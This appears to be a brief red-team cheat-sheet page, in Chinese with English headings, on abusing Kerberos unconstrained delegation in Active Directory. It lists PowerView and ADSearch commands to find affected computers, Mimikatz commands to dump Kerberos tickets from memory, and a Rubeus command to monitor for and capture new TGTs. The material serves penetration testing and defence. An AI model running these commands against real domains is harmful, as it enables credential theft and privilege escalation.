Unconstrained Delegation
无限委派
# 列出无限委派计算机
## Powerview
Get-NetComputer -Unconstrained #DCs总是出现但对于权限提升没有用
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# 使用Mimikatz导出票证
privilege::debug
sekurlsa::tickets /export #推荐的方法
kerberos::list /export #另一种方法
# 监视登录并导出新票证
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #每10秒检查新的TGTs强制认证
Force NTLM Privileged Authentication缓解
最后更新于